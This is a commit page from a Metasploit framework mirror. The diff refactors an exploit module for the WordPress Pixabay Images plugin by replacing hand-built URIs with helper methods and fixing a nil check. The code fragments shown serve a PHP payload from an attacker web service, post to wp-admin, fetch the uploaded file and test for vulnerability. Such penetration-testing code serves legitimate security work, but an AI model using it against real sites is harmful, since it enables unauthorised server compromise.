infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Use metasploit methods

bug/bundler_fix
Hans-Martin Münch (h0ng10) 2015-01-23 08:48:52 +01:00
parent 5813c639d1
commit 11bf58e548
1 changed files with 6 additions and 13 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

19
modules/exploits/unix/webapp/php_wordpress_pixabay_images.rb
View File

@ -62,13 +62,7 @@ class Metasploit3 < Msf::Exploit::Remote
return datastore['DOWNURI'] if datastore['DOWNURI']
# Create a custom URI
custom_uri = "http://" + datastore['SRVHOST']
if datastore['SRVPORT'] != "80" then
custom_uri += ":" + datastore['SRVPORT'].to_s
end
custom_uri += normalize_uri(get_resource.chomp('/')) + ".php"
custom_uri = get_uri + ".php"
return custom_uri
end
@ -77,7 +71,7 @@ class Metasploit3 < Msf::Exploit::Remote
real_fn = "#{file_name}_#{epoch_time.to_s}.php"
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'wp-content', 'uploads', real_fn),
'uri' => normalize_uri(wordpress_url_wp_content, 'uploads', real_fn),
})
return res
end
@ -87,8 +81,7 @@ class Metasploit3 < Msf::Exploit::Remote
fail_with(Failure::NoTarget, "#{target_uri} does not seeem to be Wordpress site")
end
print_status("Starting up web service on http://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}...")
print_status("Starting up web service...")
start_service
# did the user provide his own url
@ -105,7 +98,7 @@ class Metasploit3 < Msf::Exploit::Remote
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'wp-admin/'),
'uri' => normalize_uri(wordpress_url_backend),
'vars_post' => post,
})
@ -144,12 +137,12 @@ class Metasploit3 < Msf::Exploit::Remote
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'wp-admin/'),
'uri' => normalize_uri(wordpress_url_backend),
'vars_post' => post,
})
if res.body and (res.body =~ /Error: A valid URL was not provided/)
if res and (res.body =~ /Error: A valid URL was not provided/)
return Exploit::CheckCode::Vulnerable
end